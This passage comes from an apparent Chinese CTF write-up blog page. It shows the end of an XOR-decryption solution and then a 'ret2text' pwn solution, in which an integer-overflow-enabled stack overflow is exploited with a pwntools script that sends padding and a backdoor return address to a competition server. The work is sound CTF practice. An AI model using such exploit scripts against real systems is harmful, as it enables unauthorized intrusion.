打印出爆破得到的密钥</span><br><span class="hljs-built_in">print</span>(<span class="hljs-string">f"爆破出的key: <span class="hljs-subst">{key}</span>"</span>)<br><br><span class="hljs-comment"># 步骤 2: 解密整个密文</span><br>ciphertext_full = <span class="hljs-built_in">bytes</span>.fromhex(<span class="hljs-string">"e0eae7e1fde3e7fcffd9fee9f4fb"</span>)  <span class="hljs-comment"># 完整密文</span><br><br><span class="hljs-comment"># 解密过程</span><br>plaintext_full = []<br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(ciphertext_full)):<br>    plaintext_full.append(ciphertext_full[i] ^ key[i % <span class="hljs-built_in">len</span>(key)])<br><br><span class="hljs-comment"># 输出解密后的明文</span><br><span class="hljs-keyword">try</span>:<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">"解密后的明文:"</span>, <span class="hljs-built_in">bytes</span>(plaintext_full).decode())<br><span class="hljs-keyword">except</span> UnicodeDecodeError:<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">"解密后的明文包含非打印字符，无法直接显示。"</span>)<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">"解密后的字节串:"</span>, <span class="hljs-built_in">bytes</span>(plaintext_full))<br><span class="hljs-comment">#flag{eazy_xor}</span><br></code></pre></td></tr></tbody></table></figure>
<h2 id="Pwn">Pwn</h2>
<h3 id="ret2text">ret2text</h3>
<p>IDA打开附件</p>
<p><img src="https://jeremiah.oss-cn-shenzhen.aliyuncs.com/picture/202412182311320.png" alt="image-20241203200056610"></p>
<p>但是简单的栈溢出，程序会限制read函数读入的字节数小于96，但是nbytes由我们输入，所以只要输入-1造成整数溢出即可，后面就根据栈空间填payload到return的地址，然后换成后门的地址即可，exp如下</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">import</span> time<br>context(log_level = <span class="hljs-string">'debug'</span>)<br>host = <span class="hljs-string">'120.76.118.202'</span><br>port = <span class="hljs-number">33001</span><br>io = remote(host, port)<br><br><br>io.recvuntil(<span class="hljs-string">b"Type your passphrase:"</span>)  <br>io.sendline(<span class="hljs-string">b"115c79a11142301a2c418f7c689f188e"</span>) <br><span class="hljs-comment">#io.recvuntil(b"Anyway,how old are you now&gt;")  </span><br>time.sleep(<span class="hljs-number">1</span>)<br>io.sendline(<span class="hljs-string">b'-1'</span>) <br>padding = <span class="hljs-number">0x68</span> <br>return_addr = <span class="hljs-number">0x400624</span>  <br><br>payload = <span class="hljs-string">b'a'</span> * padding + p64(return_addr)  <br><span class="hljs-comment">#io.recvuntil(b"So what are you going to say?\n")  </span><br>io.sendline(payload)<br><br>io.interactive()<br><span class="hljs-comment">#flag{668c6131-3680-438b-aacd-f76c5cede90e}</span><br></code></pre></td></tr></tbody></table></figure>
<p><img src="https://jeremiah.oss-cn-shenzhen.aliyuncs.com/picture/202412182311550.png" alt="image-20241203201023628"></p>

  </div>
  <div id=""></div>
</div>

<script>
  
Fancybox.bind('[data-fancybox="fancybox-gallery-img"]', {
  dragToClose: true,
  Toolbar: true,
  closeButton: "top",
  Image: {
    zoom: true,
  },
  on: {
    initCarousel: (fancybox) => {
      const slide = fancybox.Carousel.slides[fancybox.Carousel.page];
      fancybox.$container.style.setProperty(
        "--bg-image",
        `url("${slide.$thumb.src}")`
      );
    },
    "Carousel.change": (fancybox, carousel, to, from) => {
      const slide = carousel.slides[to];
      fancybox.$container.style.setProperty(
        "--bg-image",
        `url("${slide.$thumb.src}")`
      );
    },
  },
});
</script>

<style>
    #noneimg img {
        display: none;
        z-index: 9999;
        /* width: 600px !important; */
        min-width: 0%;
        max-width: 90%;
        max-height: 80%;
        border-radius: 0px;
        position: fixed;
        box-shadow: 0 0 0px #c3c3c300 !important;
        left: 0;
        top: 0;
        right: 0;
        bottom: 0;
        margin: auto !important;
    }

    @media screen and (max-width:600px) {
        #noneimg img {
            max-width: 88%
        }
    }
</style>

    <div class="post-paging">
    
    <a href="/2024/10/30/hello-world/">
        <div class="post-paging-last">
            <span>上一篇</span>
            <p>Hello World</p>
        </div>
    </a>
    

    
</div>
</div>
		
<div class="footer">
	<div class="Copyright">
		©2024 By Jeremiah. 主题：<a
			style="text-decoration: none;display: contents; color: #898F9F;"
			target="_blank" rel="noopener" href="https://github.com/79e/hexo-theme-quiet">Quiet</a>
	</div>
	<div class="contact">
		
		<a target="_blank" rel="noopener" href="https://github.com/79E/hexo-theme-quiet">
			<img src="https://cdn.jsdelivr.net/gh/duogongneng/MyBlogImg/imggithub.png" alt="Quiet主题">
		</a>
		
	</div>
</div>

<script src="/js/gotop.js"></script>


<style type="text/css">
    @media screen and (min-width: 600px) {
        .goTop>span {
            display: flex;
            align-items: center;
            justify-content: center;
            border-radius: 10px;
            width: 40px;
            height: 40px;
            cursor: pointer;
            opacity: 0.8;
            background: rgba(18, 24, 58, 0.06);
            text-align: center;
            transition: border .5s;
            border: 1px solid rgba(18, 24, 58, 0.06);

            -moz-transition: border .5s;
            /* Firefox 4 */
            -webkit-transition: border .5s;
            /* Safari 和 Chrome */
            -o-transition: border .5s;
            /* Opera */
        }

        .goTop>span:hover {
            border: 1px solid #6680B3;
        }


        .goTop {
            position: fixed;
            right: 30px;
            bottom: 80px;
        }

        .goTop>span>svg {
            width: 20px;
            height: 20px;
            opacity: 0.7;
        }

    }

    @media screen and (max-width: 600px) {
        .goTop {
            display: none;
        }
    }
</style>
<div class="goTop" id="js-go_top">
    <span>
        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24">
            <g>
                <path d="M13 12v8h-2v-8H4l8-8 8 8z"></path>
            </g>
        </svg>
    </span>
</div>
<script>
    $( '#js-go_top' )
	.gotoTop( {
		offset: 500,
		speed: 300,
		animationShow: {
			'transform': 'translate(0,0)',
			'transition': 'transform .5s ease-in-out'
		},
		animationHide: {
			'transform': 'translate(100px,0)',
			'transition': 'transform .5s ease-in-out'
		}
	} );
</script>


<!-- Baidu Analytics -->
<script defer>
    var _hmt = _hmt || [];
    (function () {
        var hm = document.createElement("script");
        hm.src = "https://hm.baidu.com/hm.js?4b5fe1472f22fadsfs";
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(hm, s);
    })();
</script>



    <!-- Gitalk -->
    <script>
        const data = '{"clientID":"02b3c","clientSecret":"adfc7b4","repo":"gimment","owner":"duneng","admin":"duneng"}'
        const gitalk = new Gitalk({
            ...JSON.parse( data),
            id:location.pathname,
            distractionFreeMode:false
        })
        
        if(Boolean('false')){
            gitalk.render('gitalk-container')
        }
    </script>

<script>
	console.log('\n %c Hexo-Quiet 主题 %c https://github.com/79e/hexo-theme-quiet \n', 'color: #fadfa3; background: #030307; padding:5px 0;', 'background: #fadfa3; padding:5px 0;')
</script>
	</body>
</html>

